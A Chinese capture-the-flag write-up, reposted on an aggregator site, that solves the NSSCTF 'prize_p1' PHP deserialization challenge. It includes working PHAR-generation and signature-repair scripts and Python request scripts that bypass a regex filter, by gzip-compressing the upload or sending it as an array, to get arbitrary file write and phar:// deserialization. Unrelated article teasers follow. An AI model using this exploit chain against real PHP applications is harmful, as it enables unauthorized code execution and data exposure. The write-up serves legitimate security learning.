[NSSCTF]prize_p1

前言

之前做了p5 才知道还有p1到p4

遂来做一下

顺便复习一下反序列化

prize_p1

<META http-equiv="Content-Type" content="text/html; charset=utf-8" /><?phphighlight_file(__FILE__);class getflag{function __destruct(){echo getenv("FLAG");}}class A{public $config;function __destruct(){if ($this->config == 'w') {$data = $_POST[0];if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $data)) {die("我知道你想干吗,我的建议是不要那样做。");}file_put_contents("./tmp/a.txt", $data);} else if ($this->config == 'r') {$data = $_POST[0];if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $data)) {die("我知道你想干吗,我的建议是不要那样做。");}echo file_get_contents($data);}}}if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $_GET[0])) {die("我知道你想干吗,我的建议是不要那样做。");}unserialize($_GET[0]);throw new Error("那么就从这里开始起航吧");

这里定义两个类

第一个类可以通过触发_destruct()得到flag

第二个类可以实现文件读写的功能

可以传两个变量 一个post一个get

因为get里面正则匹配过滤了getflag 我们没法用get传参直接反序列化触发getflag类

但是可以利用post 上传phar文件 再用phar协议读取

就可以反序列化class getflag

从而触发__destruct()魔术方法 echo flag

那么我们第一步先生成phar文件

<?php
highlight_file(__FILE__); // 将当前PHP文件的内容进行语法高亮并输出到页面上class getflag // 定义一个名为 Testobj 的类
{// 声明一个属性 $output,初始值为空字符串
}@unlink('test.phar');   // 删除之前的 test.phar 文件(如果有),@ 符号用于抑制可能出现的文件不存在的警告
$phar = new Phar('test.phar');  // 创建一个名为 test.phar 的 PHAR 文件对象
$phar->startBuffering();  // 开始写入 PHAR 文件
$phar->setStub('<?php __HALT_COMPILER(); ?>');  // 使用 setStub 方法设置 PHAR 文件的启动器(stub),__HALT_COMPILER(); 是 PHP 的特殊标记,表示文件编译的结束
$o = new getflag(); // 创建了一个 Testobj 类的实例
$phar->setMetadata($o); // 将 $o 对象作为元数据写入到 PHAR 文件中,这种方法不再安全,可能导致安全漏洞
$phar->addFromString("test.txt", "test");  // 向 PHAR 文件中添加一个名为 test.txt 的文件,文件内容为字符串 "test"
$phar->stopBuffering(); // 停止写入 PHAR 文件

但是post里面也过滤了getflag

生成的phar文件里面还是包含getflag明文

类比之前做过一题phar反序列化 只要把

phar文件打成压缩包

(gzip bzip2 tar zip 这四个后缀同样也支持phar://读取)

传输进去的就是二进制流乱码 就可以绕过正则匹配

写个脚本上传一下

import requests
import re
import gzipurl="http://node4.anna.nssctf.cn:28134/"### 先将phar文件变成gzip文件
with open("./1.phar",'rb') as f1:phar_zip=gzip.open("gzip.zip",'wb')                  #创建了一个gzip文件的对象phar_zip.writelines(f1)                                #将phar文件的二进制流写入phar_zip.close()###写入gzip文件
with open("gzip.zip",'rb') as f2:data1={0:f2.read()}           #利用gzip后全是乱码绕过               param1 = {0: 'O:1:"A":1:{s:6:"config";s:1:"w";}'}p1 = requests.post(url=url, params=param1,data=data1)### 读gzip.zip文件,获取flag
param2={0:'O:1:"A":1:{s:6:"config";s:1:"r";}'}
data2={0:"phar://tmp/a.txt"}
p2=requests.post(url=url,params=param2,data=data2)
flag=re.compile('NSSCTF\{.*?\}').findall(p2.text)       
print(flag)

最后返回的结果为空

再回去看这个代码

要绕过这个异常

绕过异常

在进行phar操作的时候,通过file_get_contents函数利用phar协议来读取时,也是将里面的getflag类进行反序列化,因为这个异常,我们是不能执行getflag类中的__destruct方法的,所以我们需要绕过异常。那么我们可以在phar文件明文部分修改为

a:2:{i:0;O:7:"getflag":{}i:0;N;}

怎么理解呢?这是一个数组,反序列化是按照顺序执行的,那么这个Array[0]首先是设置为getflag对象的,然后又将Array[0]赋值为NuLL,那么原来的getflag就没有被引用了,就会被GC机制回收从而触发__destruct方法。

重新生成phar文件

<?php
highlight_file(__FILE__); // 将当前PHP文件的内容进行语法高亮并输出到页面上class getflag // 定义一个名为 Testobj 的类
{// 声明一个属性 $output,初始值为空字符串
}@unlink('test.phar');   // 删除之前的 test.phar 文件(如果有),@ 符号用于抑制可能出现的文件不存在的警告
$phar = new Phar('p1.phar');  // 创建一个名为 test.phar 的 PHAR 文件对象
$phar->startBuffering();  // 开始写入 PHAR 文件
$phar->setStub('<?php __HALT_COMPILER(); ?>');  // 使用 setStub 方法设置 PHAR 文件的启动器(stub),__HALT_COMPILER(); 是 PHP 的特殊标记,表示文件编译的结束
$o = new getflag(); // 创建了一个 Testobj 类的实例
$o = array(0=>$o,1=>null);
$phar->setMetadata($o); // 将 $o 对象作为元数据写入到 PHAR 文件中,这种方法不再安全,可能导致安全漏洞
$phar->addFromString("test.txt", "test");  // 向 PHAR 文件中添加一个名为 test.txt 的文件,文件内容为字符串 "test"
$phar->stopBuffering(); // 停止写入 PHAR 文件

但是我们一旦更改phar里的内容就要修改它的签名

修复签名的代码

from hashlib import sha1
f = open('./p12.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('ph2.phar', 'wb').write(newf) # 写入新文件

再运行一下

import requests
import re
import gzipurl="http://node4.anna.nssctf.cn:28134/"### 先将phar文件变成gzip文件
with open("./ph2.phar",'rb') as f1:phar_zip=gzip.open("gzip.zip",'wb')                  #创建了一个gzip文件的对象phar_zip.writelines(f1)                                #将phar文件的二进制流写入phar_zip.close()###写入gzip文件
with open("gzip.zip",'rb') as f2:data1={0:f2.read()}           #利用gzip后全是乱码绕过               param1 = {0: 'O:1:"A":1:{s:6:"config";s:1:"w";}'}p1 = requests.post(url=url, params=param1,data=data1)### 读gzip.zip文件,获取flag
param2={0:'O:1:"A":1:{s:6:"config";s:1:"r";}'}
data2={0:"phar://tmp/a.txt"}
p2=requests.post(url=url,params=param2,data=data2)flag=re.compile('NSSCTF\{.*?\}').findall(p2.text)
print(flag)

成功得到flag

看别的wp又学到这里用数组的话 不压缩也可以绕过正则

import requests
import reurl="http://node4.anna.nssctf.cn:28134/"### 写入phar文件
with open("ph2.phar",'rb') as f:data1={'0[]':f.read()}          #传数组绕过,值就是hacker1.phar文件的内容param1 = {0: 'O:1:"A":1:{s:6:"config";s:1:"w";}'}res1 = requests.post(url=url, params=param1,data=data1)### 读phar文件,获取flag
param2={0:'O:1:"A":1:{s:6:"config";s:1:"r";}'}
data2={0:"phar://tmp/a.txt"}
res2=requests.post(url=url,params=param2,data=data2)
flag=re.compile('NSSCTF\{.*?\}').findall(res2.text)
print(flag)

原理如下:

preg_match与file_put_contents(php函数特性利用)

前面讲到了,一般在利用file_put_contents这类函数写phar文件之前会有preg_match这种函数的限制,但是这里我们利用php函数的特性,可以完全绕过这种限制,php中有一些函数不能处理数组,会直接返回false,从而实现绕过,而preg_match就是其中一个,而file_put_contents又恰好能把数组的内容也写入文件,所以这样的组合就等同于无视waf任意写

最后

总结一下这题的知识点

__destruct触发

对象的析构函数在对象被销毁时触发,对象被销毁的情况

正常销毁:

当整个程序生命周期结束前会销毁所有的对象

可以看到 在整个程序执行完后才触发了__destruct()魔术方法

手动释放变量销毁

使用unset函数释放变量

在程序执行完之前我们手动释放了变量

触发__destruct()魔术方法

gc回收未引用变量

面向对象的语言内部都有gc机制,来回收没有被引用的变量,所以这个时候也会触发__destruct

创建时就未被引用



这里创建对象的时候没有用变量来接收引用,所以也在echo "lll\n"之前就被gc回收触发析构函数

创建后人为消除引用



这里对象创建的时候是$a这个数组里面0索引指向引用的,在10行改变0索引指向null,这样就使得a的对象没有任何引用,所以也会在11行执行前,被gc回收销毁触发析构函数

这题就是用这个方法提前触发这个析构函数 从而绕过最后一行的抛出异常

preg_match与file_put_contents(php函数特性利用)

前面讲到了,一般在利用file_put_contents这类函数写phar文件之前会有preg_match这种函数的限制,但是这里我们利用php函数的特性,可以完全绕过这种限制,php中有一些函数不能处理数组,会直接返回false,从而实现绕过,而preg_match就是其中一个,而file_put_contents又恰好能把数组的内容也写入文件,所以这样的组合就等同于无视waf任意写

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/831394.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

出现 Error: listen EACCES: permission denied 0.0.0.0:80 解决方法

目录 1. 问题所示2. 原理分析3. 解决方法1. 问题所示 执行VUE项目的时候,出现如下问题 error when starting dev server: Error: listen EACCES: permission denied 0.0.0.0:80at Server.setupListenHandle [as _listen2] (node:net:1468:21)at listenInC

The Role of Subgroup Separability in Group-Fair Medical Image Classification

文章目录 The Role of Subgroup Separability in Group-Fair Medical Image Classification摘要方法实验结果 The Role of Subgroup Separability in Group-Fair Medical Image Classification 摘要 研究人员调查了深度分类器在性能上的差异。他们发现&#xff0c;分类器将个…

基于Springboot的民宿管理平台

基于SpringbootVue的民宿管理平台设计与实现 开发语言&#xff1a;Java数据库&#xff1a;MySQL技术&#xff1a;SpringbootMybatis工具&#xff1a;IDEA、Maven、Navicat 系统展示 用户登录 首页 民宿信息 后台登录 后台首页 用户管理 商家管理 民宿信息管理 房间类型管理 …

Github2024-05-02开源项目日报 Top10

根据Github Trendings的统计,今日(2024-05-02统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下: 开发语言项目数量TypeScript项目4Rust项目2Vue项目1GDScript项目1SystemVerilog项目1Python项目1非开发语言项目1精心策划的编码面试准备材料 创建周期:2764 天…

【正版系统】知识付费系统搭建,系统模板开发完善功能强大,支持快速部署上线

在数字化时代&#xff0c;知识付费已成为一种趋势&#xff0c;为内容创作者和求知者搭建了一个高效的交流平台。今天&#xff0c;我要为大家介绍一款功能强大的知识付费系统。 知识付费系统模板是我们一款经过精心开发、完善的系统&#xff0c;旨在为用户提供一站式的知识付费…

【Docker】如何注册Hub账号并上传镜像到Hub仓库

一、创建Hub账户 浏览器访问&#xff1a;hub.docker.com 点击【Sign up】注册账号 输入【邮箱】【用户名】【密码】 ps&#xff1a;用户名要有字母数字&#xff1b;订阅不用勾选 点击【Sign up】注册即可 点击【Sign in】登录账号 输入【邮箱】【密码】 点击【Continue】登录 二…

Unreal 编辑器工具 批量重命名资源

右键 - Editor Utilities - Editor Utility Blueprint&#xff0c;基类选择 Asset Action Utility 在类默认值内&#xff0c;可以添加筛选器&#xff0c;筛选指定的类型 然后新建一个函数&#xff0c;加上4个输入&#xff1a;ReplaceFrom&#xff0c;ReplaceTo&#xff0c;Add…

函数与作用域

函数与作用域 函数基础与高级用法 函数基础是编程中的一个重要概念&#xff0c;它是一段可重用的代码块&#xff0c;用于执行特定的任务或计算。函数可以接受输入参数&#xff0c;并返回输出结果。函数可以提高代码的可读性、可维护性和复用性。 函数的基本用法包括定义函数…

大数据学习笔记14-Hive基础2

一、数据字段类型 数据类型 &#xff1a;LanguageManual Types - Apache Hive - Apache Software Foundation 基本数据类型 数值相关类型 整数 tinyint smallint int bigint 小数 float double decimal 精度最高 日期类型 date 日期 timestamps 日期时间 字符串类型 s…

nginx--自定义日志跳转长连接文件缓存状态页

自定义日志服务 [rootlocalhost ~]# cat /apps/nginx/conf/conf.d/pc.conf server {listen 80;server_name www.fxq.com;error_log /data/nginx/logs/fxq-error.log info;access_log /data/nginx/logs/fxq-access.log main;location / {root /data/nginx/html/pc;index index…

使用STM32F103C8T6与蓝牙模块HC-05连接实现手机蓝牙控制LED灯

导言: 在现代智能家居系统中,远程控制设备变得越来越普遍和重要。本文将介绍如何利用STM32F103C8T6单片机和蓝牙模块HC-05实现远程控制LED灯的功能。通过这个简单的项目,可以学会如何将嵌入式系统与蓝牙通信技术相结合,实现远程控制的应用。 目录 导言: 准备工作: 硬…

Java零基础入门到精通_Day 11

1.继承 定义&#xff1a; 继承是面向对象三大特征之一。可以使得子类具有父类的属性和方法&#xff0c;还可以在子类中重新定义&#xff0c;追加属性和方法 格式&#xff1a; public class 子类 extends 父类{} 子类&#xff1a;也叫派生类 父类&#xff1a;基类/超类 继…

低代码技术在构建质量管理系统中的应用与优势

引言 在当今快节奏的商业环境中&#xff0c;高效的质量管理系统对于组织的成功至关重要。质量管理系统帮助组织确保产品或服务符合客户的期望、符合法规标准&#xff0c;并持续改进以满足不断变化的需求。与此同时&#xff0c;随着技术的不断进步&#xff0c;低代码技术作为一…

机器学习笔记-14

机器学习系统设计 1.导入 以垃圾邮件分类器为例子&#xff0c;当我们想要做一个能够区分邮件是否为垃圾邮件的项目的时候&#xff0c;首先在大量垃圾邮件中选出出现频次较高的10000-50000词作为词汇表&#xff0c;并为其设置特征&#xff0c;在对邮件分析的时候输出该邮件的特…

Vue 3 Hooks: 深入理解 Composition API 的魅力

hooks简介 Vue 3 引入了革命性的 Composition API&#xff0c;它提供了一系列的 Hooks&#xff08;也称为Composition Functions&#xff09;&#xff0c;让组件的逻辑组织更加清晰、复用性更强。本文将深入探讨Vue 3的Hooks使用&#xff0c;从基础概念到实践应用&#xff0c;…

Kerckhoffs原则详细介绍

Kerckhoffs原则&#xff0c;也被称为柯克霍夫原则或柯克霍夫假说&#xff0c;是密码学中的一个核心原则&#xff0c;它起源于19世纪&#xff0c;由荷兰语言学家和密码学家Auguste Kerckhoffs提出。这一原则在密码学领域具有深远的影响&#xff0c;为现代密码系统的设计和安全性…

数据结构(三)------栈

制作不易&#xff0c;三连支持一下呗&#xff01;&#xff01;&#xff01; 文章目录 前言一、什么是栈二、栈的实现 1.栈的结构2.栈的初始化和销毁3.栈的插入数据和删除数据4.取栈顶元素总结 前言 前面我们介绍了第二种数据结构---链表&#xff0c;这里我们继续介绍下一种数据…

SpringBoot3 + SpringSecurity6 + JWT

相关链接 Spring Security mvnrepository 1. pom 引入 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-security</artifactId> </dependency> <dependency><groupId>org.spring…

Python一些可能用的到的函数系列126 UCS函数

说明 UCS(Universal Calculation Standard)要求数据是以块进行组织的&#xff1a; 1 数据的存储要按块2 数据的处理也是按块 内容 1 已经完成的部分 假设&#xff0c;数据是按照数值顺序编号的。最常见的是mysql的自增ID&#xff0c;因为这种范式比较好&#xff0c;所以我…

计算机网络-408考研

后续更新发布在B站账号&#xff1a;谭同学很nice http://【计算机408备考-什么是计算机网络&#xff0c;有什么特点&#xff1f;】 https://www.bilibili.com/video/BV1qZ421J7As/?share_sourcecopy_web&vd_source58c2a80f8de74ae56281305624c60b13http://【计算机408备考…